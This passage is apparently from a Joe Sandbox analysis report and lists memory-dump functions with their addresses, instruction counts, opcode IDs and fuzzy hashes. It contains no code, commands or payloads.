                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba2f84f16c2e0d8766f7200851139923c9f13ec861da8af4c5028f323d404f54
                                          • Instruction ID: db08764b62b786aea853211c57f215fc55b521ce0e0d93f0faee4bbde41aa4bd
                                          • Opcode Fuzzy Hash: ba2f84f16c2e0d8766f7200851139923c9f13ec861da8af4c5028f323d404f54
                                          • Instruction Fuzzy Hash: 5C81D130A0AB0A8FD375DB54C5A057177E1FF04308B15497DD48AC7AF6CAB9B942CB82
                                          Function 00007FFD9BBE54A7 Relevance: .2, Instructions: 197COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bdab4da6af3bc7012e36eaadba662b4f632f1158c2d5aa7a29fb4f2c2e4fc7e
                                          • Instruction ID: 40d4ad0ff8bf8943921cf33a744f34792a2a4f4c551bec8148ba63d67e78694e
                                          • Opcode Fuzzy Hash: 0bdab4da6af3bc7012e36eaadba662b4f632f1158c2d5aa7a29fb4f2c2e4fc7e
                                          • Instruction Fuzzy Hash: 06610430A0EA4A8FD399DF58C4A05A4BBE0FF15304B5541B9C44ACBAE7CB28F951C7D1
                                          Function 00007FFD9BBE6AE1 Relevance: .2, Instructions: 196COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0fdd4a0b2e8d28b5de4bb007a9b0368ac9ecc9fe76006ba230751c6258a20d60
                                          • Instruction ID: 0b4645aafe7e419ae46362f9ab38215136f6b526dfb9313464b9ff0e9d85fe37
                                          • Opcode Fuzzy Hash: 0fdd4a0b2e8d28b5de4bb007a9b0368ac9ecc9fe76006ba230751c6258a20d60
                                          • Instruction Fuzzy Hash: 8B71E230A0AB0A4FD374DB54D5A566177E1FF44308B41597DC48BC3AF2CB69B882CB82
                                          Function 00007FFD9BBEB947 Relevance: .2, Instructions: 194COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b804be474500a12d26fbe01ac46bfc3370207e5bdd205a7d200cda2d3520e5e
                                          • Instruction ID: 3f77a4a373355b60c5e135b28f26c8c973cc2185ce3c4661b3bdff8ea4e8ff48
                                          • Opcode Fuzzy Hash: 4b804be474500a12d26fbe01ac46bfc3370207e5bdd205a7d200cda2d3520e5e
                                          • Instruction Fuzzy Hash: 0361253060EA4A8FD769EB68D1F05A4BBA0FF05304B4541B9C04AC7AE7DB28B951C7D2
                                          Function 00007FFD9BBE42CD Relevance: .2, Instructions: 185COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d77e2d9c806fd4a457bc29f61eced427be01dc412d80895a9552d0cd1796d757
                                          • Instruction ID: 4301ef975faa0493098b473a0d79ae6b4af62c063507db06c5481894909e8427
                                          • Opcode Fuzzy Hash: d77e2d9c806fd4a457bc29f61eced427be01dc412d80895a9552d0cd1796d757
                                          • Instruction Fuzzy Hash: 6951C531B1990E8FE768DB58D461AE8B3A1FF94354F05427ED41EC32E6DE28B90287C1
                                          Function 00007FFD9BBEAD7B Relevance: .2, Instructions: 185COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45f7c056ec921f4d4b304ca9e63acdff59df2ef1f34a9748f43a4e0df676a6d1
                                          • Instruction ID: 254e2e2a84f9617cf648dccb19fd3e3f54d18dea716a4c038ddb65c66ad0f3f7
                                          • Opcode Fuzzy Hash: 45f7c056ec921f4d4b304ca9e63acdff59df2ef1f34a9748f43a4e0df676a6d1
                                          • Instruction Fuzzy Hash: AA512531B1EA494BE3389B68A85117577D4FF45318B26097ED08BC75F2D929B50383C2
                                          Function 00007FFD9BBE2FD5 Relevance: .2, Instructions: 167COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2304c22b4b584257c5e822082481b003ca72a6ca26c33c9dd5ac275014df786
                                          • Instruction ID: df54fc1efee2d60e4e6e2e5d11aa91d3173d4177b0fc9ed87e24859f04e957c5
                                          • Opcode Fuzzy Hash: f2304c22b4b584257c5e822082481b003ca72a6ca26c33c9dd5ac275014df786
                                          • Instruction Fuzzy Hash: D0513E70A0955D8FDBA9DB58C8A0BF9B7B1FB54305F1101BAD00EE32E5DE356A84CB41
                                          Function 00007FFD9BBE7578 Relevance: .2, Instructions: 156COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7de93898433e7c6ab7f741116199f269dac4008290f576e6ff61cfc88acc71fe
                                          • Instruction ID: eef07b2c96ffdf57b2a4dfcae4ebe23964a4164e054a46e8978c39adc4260c74
                                          • Opcode Fuzzy Hash: 7de93898433e7c6ab7f741116199f269dac4008290f576e6ff61cfc88acc71fe
                                          • Instruction Fuzzy Hash: C451C671E1891D8FDF94EF98D494AADBBB1FF68304F500169D00DE7295DB34A981CB81
                                          Function 00007FFD9BBE49C4 Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4720b9f8fc8b5e3f50014fdb88f96c91d9286f21c212ab0e83c4a2e20c68230d
                                          • Instruction ID: 55aaa9c8f23b0f77bd3c1bc69dd412a084f55117598905ac6f89731552f5954e
                                          • Opcode Fuzzy Hash: 4720b9f8fc8b5e3f50014fdb88f96c91d9286f21c212ab0e83c4a2e20c68230d
                                          • Instruction Fuzzy Hash: 35411731B1E6094FE3789A99986607D77D0FF56328B12257ED48EC31F2D919B60283CB
                                          Function 00007FFD9BBEC2D0 Relevance: .1, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0ed35894c6b13dca573854b0d88c4c9aff74d635f3dbd7eda0006067eb599fd
                                          • Instruction ID: 05965f114a4c3a36b17cb2e97a9edbb5ee6b2d2a71040094c73c753e5ce7360a
                                          • Opcode Fuzzy Hash: d0ed35894c6b13dca573854b0d88c4c9aff74d635f3dbd7eda0006067eb599fd
                                          • Instruction Fuzzy Hash: DA41F421A1D95E8FEBB8DA58C4706F877A1FF54304F1541BAD04EC71E6DE386A818BC2
                                          Function 00007FFD9BBE7107 Relevance: .1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a594eb7fd611abded45a80a4358fd200e66c26a319f0211ca7360351a65c4f21
                                          • Instruction ID: ebcf7f843bedafac3b9f97e97b9794506b1a5614bb44bc0a7063da0216387bd4
                                          • Opcode Fuzzy Hash: a594eb7fd611abded45a80a4358fd200e66c26a319f0211ca7360351a65c4f21
                                          • Instruction Fuzzy Hash: ED41623260C9088FDF98EF58D4A5EA5B3E1FBA8314B1401AAD05EC31A6DE25EC45CB81
                                          Function 00007FFD9BBED5A7 Relevance: .1, Instructions: 123COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2de64569fbc3699f7c093e23e3df5e195b1e985d9f88edbaabd7948dd87bb799
                                          • Instruction ID: 0e4e8774500e0368e28c6402ad18f6081c8c357a46a8365adb48d0a1fe51205a
                                          • Opcode Fuzzy Hash: 2de64569fbc3699f7c093e23e3df5e195b1e985d9f88edbaabd7948dd87bb799
                                          • Instruction Fuzzy Hash: 90414F31708D088FDF98EF68C4A5DA8B7E1FB6871470501AAD44EC31A6DE25ED45CB82
                                          Function 00007FFD9BBE71B1 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6f317e0017bb5e165c5f9320c73a33cba37542e0a56f61b047ed62a23b45a55
                                          • Instruction ID: dc5a1d3917209a2328f8ec5880ddfb9e5f73e1385cc579d3dc7ddc39466e10d9
                                          • Opcode Fuzzy Hash: d6f317e0017bb5e165c5f9320c73a33cba37542e0a56f61b047ed62a23b45a55
                                          • Instruction Fuzzy Hash: BC31823160C9488FDF5CEF18C0A5EA5B3E1FBA8314B0401AED05AC71A6DE29EC40CB81
                                          Function 00007FFD9BBED651 Relevance: .1, Instructions: 118COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 746724ca2c353c4fd3652040d0301e0d7d205935953eaa45ffb8e62efb963a6f
                                          • Instruction ID: 087801abdf40f0b600822bc8e927afecc0f0d2afd84f5ae415929a3075049fcf
                                          • Opcode Fuzzy Hash: 746724ca2c353c4fd3652040d0301e0d7d205935953eaa45ffb8e62efb963a6f
                                          • Instruction Fuzzy Hash: CB317E31708D488FDFA8EF28C4A5EA477E1FF6871470401A9D44AC71A6DE29EC40CB82
                                          Function 00007FFD9BBEAE4C Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 676e469ed9c07f1d007c3151f2235a2b86e9ce2ca079984b87f19b5586f8b4b5
                                          • Instruction ID: c8c5d153be74a2a1824ad9d7d40fc4758ffa37f087fb26a5d2ebe0e61b4a01f2
                                          • Opcode Fuzzy Hash: 676e469ed9c07f1d007c3151f2235a2b86e9ce2ca079984b87f19b5586f8b4b5
                                          • Instruction Fuzzy Hash: E2310561A1EA8D4BE338976898651757BD8FF56318B26057ED0CFC70F2D918760342C3
                                          Function 00007FFD9BBE714B Relevance: .1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5d62a2a8663cbb665ed748e6dc9161ea03d55d70a3318df44fb6815e2c65fa1
                                          • Instruction ID: 90551890ff6dd5fc1b0660fa62fcc7fc3241ded430e819e862b5144827649f99
                                          • Opcode Fuzzy Hash: d5d62a2a8663cbb665ed748e6dc9161ea03d55d70a3318df44fb6815e2c65fa1
                                          • Instruction Fuzzy Hash: 6E31653160C9498FDF5CEF18C0A5EA5B3E1FBA8314B1501ADD05AC71A6DE29FC45CB81
                                          Function 00007FFD9BBED5EB Relevance: .1, Instructions: 113COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c03e9c33ec87766af4a86dab2d784715c4dbca816fba8c849470aafd28b8f11f
                                          • Instruction ID: 38b58965be25f2acb8c286a2ff53d16ae5bc907a8c6e3e66b6b6b9514d558ef8
                                          • Opcode Fuzzy Hash: c03e9c33ec87766af4a86dab2d784715c4dbca816fba8c849470aafd28b8f11f
                                          • Instruction Fuzzy Hash: 77314E31708D498FDFA8EF28C4A5EA477E1FB6871470501A9D44AC71A6DE29EC45CB81
                                          Function 00007FFD9BBE8E0D Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c24eaaef8c93a097664a8a710d0caeabccd102c004d51b3522439d498308798
                                          • Instruction ID: e9656ca44fbebd2ba9c6c1fdcd8a5c57e702b0ff6c16f8ed6f87ec296c988f17
                                          • Opcode Fuzzy Hash: 9c24eaaef8c93a097664a8a710d0caeabccd102c004d51b3522439d498308798
                                          • Instruction Fuzzy Hash: 68414F30E1994E8FDFA8DB98D8A0AFD77B1FF58304F110079D00AE72A4DA34A941CB91
                                          Function 00007FFD9BBEA71D Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2836ebcb23a2f865966567341e6348654c8635ca5ff40fd6bcd72003d2aa3c1
                                          • Instruction ID: a3ec1b9e850ec3cd145a4d254205da06d75d756ee0e6001a809c1944343bf3b7
                                          • Opcode Fuzzy Hash: d2836ebcb23a2f865966567341e6348654c8635ca5ff40fd6bcd72003d2aa3c1
                                          • Instruction Fuzzy Hash: 1E318171B0990E8FDB58DB9CD4A16A8B3E2FF48314B114279D00ED32A2CF24B812CBC1
                                          Function 00007FFD9BBEA7DA Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a99568c2056a151f5453efea9c76a92920b50ff9290d179482c5f19976da5efd
                                          • Instruction ID: 44857ae294340e043022603bf4d6d5cd191fece4b10b654ab9f2e5286fd0c905
                                          • Opcode Fuzzy Hash: a99568c2056a151f5453efea9c76a92920b50ff9290d179482c5f19976da5efd
                                          • Instruction Fuzzy Hash: 3C310772B19A4E4FEB68E79888727A877D1FF44314F4502BAD05FC71E2E9246906C3C2
                                          Function 00007FFD9BBEB1CE Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 863c7e8acca4a73f522fc754845a4da3a6c51211f7d9bcf7dbf702ec25f4bca3
                                          • Instruction ID: bfadbd5522bb95812a694f987d6477063dfc01a11a6df76d0b45fba751e0ef3b
                                          • Opcode Fuzzy Hash: 863c7e8acca4a73f522fc754845a4da3a6c51211f7d9bcf7dbf702ec25f4bca3
                                          • Instruction Fuzzy Hash: 8D31783130E6494FD321CB6CE8B66E87B90EF45324F1502BBD846C71F2C668B61683C1
                                          Function 00007FFD9BBE436E Relevance: .1, Instructions: 91COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5a41257cbbe6931340c631913749e052881869805d357b0e45616afaff841f7
                                          • Instruction ID: 505789115ff2e7f4b5f851079452447166537e2b112a8bd7aeb423d5223b6d58
                                          • Opcode Fuzzy Hash: e5a41257cbbe6931340c631913749e052881869805d357b0e45616afaff841f7
                                          • Instruction Fuzzy Hash: E8212721F1E94D4FE764979898722AC77E1FF45318F05027ED05EC35F2DD1869058682
                                          Function 00007FFD9BBE5E00 Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 249ed5b28061343165ae89b681e237d4b1f471ae5bea3956e480723d6d40c9ef
                                          • Instruction ID: fcc39e1c90bb2c022a3b410c0cec6b29fb50689042e9aa9f641856ba44549172
                                          • Opcode Fuzzy Hash: 249ed5b28061343165ae89b681e237d4b1f471ae5bea3956e480723d6d40c9ef
                                          • Instruction Fuzzy Hash: 6A31DC2062E59A4AF73AC25844705747B51FF9230571946BAC09B8A8FBD82CB9C5D3C2
                                          Function 00007FFD9BBE6F28 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f29d999c7dfe1a20c1e0c885fbabd86761a4dcc32c39caa1d863243ecca61f0
                                          • Instruction ID: aef6f26dd6c041cb0c25a062924fc27689d12ca1aa844e8dda72c14ad35a2a94
                                          • Opcode Fuzzy Hash: 3f29d999c7dfe1a20c1e0c885fbabd86761a4dcc32c39caa1d863243ecca61f0
                                          • Instruction Fuzzy Hash: C7312930A1A50ECEEBA8DB8484655BD76B1FF44349F51017AD41FDA1F1DE38BA4097C2
                                          Function 00007FFD9BBE7FE8 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25f3e23bb1e159ccecaa96e19cdf528103412ec4d91c2e23acaaf87f9295db58
                                          • Instruction ID: 4bc39bf50de84a10d336916487f11d747e848bc0ad44674c23195e2209170598
                                          • Opcode Fuzzy Hash: 25f3e23bb1e159ccecaa96e19cdf528103412ec4d91c2e23acaaf87f9295db58
                                          • Instruction Fuzzy Hash: 8D312A30B1D94ECFEBB8DB8484A15BD76B1FF64308F51007AD41ED21F1DAB87A409692
                                          Function 00007FFD9BBE3232 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb32b1af937fe8ca1ac2afbff3207437b2557071bafbf02897791fa171370ef1
                                          • Instruction ID: e8d6486a9fe1deff9e245a2e9a589b2ed84fada6fda6432f34d711e7a9985a8e
                                          • Opcode Fuzzy Hash: cb32b1af937fe8ca1ac2afbff3207437b2557071bafbf02897791fa171370ef1
                                          • Instruction Fuzzy Hash: 7021F930A0891D9FDF99DB58C465AECB3B1FF68304F1141AED04EE32A1CA35A9808B81
                                          Function 00007FFD9BBE5E30 Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da5c4134520037b43f4413befe054f5ab285f3a4f23143b203dd04101f3b8508
                                          • Instruction ID: 5448aeafc1401f0d32834b5bbcefb7e0bd2aafbf82fb39a99eefa3bcc5ffdbe2
                                          • Opcode Fuzzy Hash: da5c4134520037b43f4413befe054f5ab285f3a4f23143b203dd04101f3b8508
                                          • Instruction Fuzzy Hash: 3F21FB30B2D45A4AF638D25884754B877A1FF90309B1545BAC05B8B8FADD2CF9C1C3C2
                                          Function 00007FFD9BBE26BD Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f3f092b7a79235e92f39e12550fc2ee363a826bf6a3b659836ba05556551d24
                                          • Instruction ID: ccd5dd96c681f94abf68f223cef1c2bfd2401b2a85fd67a2c0f84b91d68f4c60
                                          • Opcode Fuzzy Hash: 6f3f092b7a79235e92f39e12550fc2ee363a826bf6a3b659836ba05556551d24
                                          • Instruction Fuzzy Hash: C9216A35E19A4D8FDF94DB98C8609EDBBB1FF58304F51017AD00AE32E1DB28A945CB81
                                          Function 00007FFD9BBE96C9 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a982e0fd640418596fa70750a121b7f165d39acf589f2602563f776ee14f071
                                          • Instruction ID: 99a32b06bf2dbbcfa1dd829f49ed8d25e4955cc10d51ce043cd82c0056395792
                                          • Opcode Fuzzy Hash: 5a982e0fd640418596fa70750a121b7f165d39acf589f2602563f776ee14f071
                                          • Instruction Fuzzy Hash: AE212A70E1990D9FDFA8DB58C4A9AADB7A1FF58304F0100BED04EE32A5CE34A9448B41
                                          Function 00007FFD9BBFCF28 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94759d57192738775314c1f03f459aa48e4a9d3faac027ba9afd952576c90701
                                          • Instruction ID: 03eedb255b7973bdc64d96ed16ca7c1f096d51bd940ee30ed8a5df5b0bd8abdb
                                          • Opcode Fuzzy Hash: 94759d57192738775314c1f03f459aa48e4a9d3faac027ba9afd952576c90701
                                          • Instruction Fuzzy Hash: 6D21FC20E1D52B86FA3C8A9440705BCB6A1EB54344B154576D4CB8F0EAC91CBB81D680
                                          Function 00007FFD9BBEC2C8 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6dcc70feabb847c4c01d6ac1105103873029c5edbf8c41a550405b3f72039dc
                                          • Instruction ID: 3a4923d870bf6fad2aa137ba2dc8587f3d9dc2b719e6f78d16eb6d3d2f09a187
                                          • Opcode Fuzzy Hash: f6dcc70feabb847c4c01d6ac1105103873029c5edbf8c41a550405b3f72039dc
                                          • Instruction Fuzzy Hash: F3216011B2D86F4AF738C698C0704B87391FF543087254579D05B8B5FAC93CBA8097C2
                                          Function 00007FFD9BBEB350 Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
